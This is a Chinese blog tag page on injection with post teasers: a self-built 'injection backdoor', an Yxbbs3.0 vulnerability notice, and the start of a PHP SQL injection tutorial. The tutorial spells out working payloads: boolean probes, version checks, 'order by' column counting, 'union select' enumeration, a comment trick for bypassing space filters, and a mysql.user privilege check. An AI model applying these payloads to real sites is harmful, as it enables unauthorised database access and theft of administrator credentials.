Tag: 注入预览模式: 普通 | 列表

超级另类后门 自己构造注入表

小毅's Blog

小毅:虽然能构建注入,但是存在局限性的!

<!--#include file="conn.asp"-->

查看更多...

Tags: 注入 后门

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 80

Yxbbs3.0 两个注入漏洞

发布:小强

影响版本:
Yxbbs3.0
漏洞描述:

查看更多...

Tags: Yxbbs 注入 漏洞

分类:漏洞相关 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 85

php注入十点基本步骤

1.判断是否存在注入,加';and 1=1;and 1=2
2.判断版本 and ord(mid(version(),1,1))>51 /* 返回正常说明是4.0以上版本,可以用union查询
3.利用order by 暴字段,在网址后加 order by 10 /* 如果返回正常说明字段大于10
4.再利用union来查询准确字段,如: and 1=2 union select 1,2,3,......./*直到返回正常,说明猜到准确字段数。如过滤了空格可以用/**/代替。
5.判断数据库连接帐号有没有写权限,and (select count(*) from mysql.user)>0 /*如果结果返回错误,那我们只能猜解管理员帐号和密码了。

查看更多...

Tags: 注入

分类:技术文章 | 固定链接 | 评论: 0 | 引用: 0 | 查看次数: 62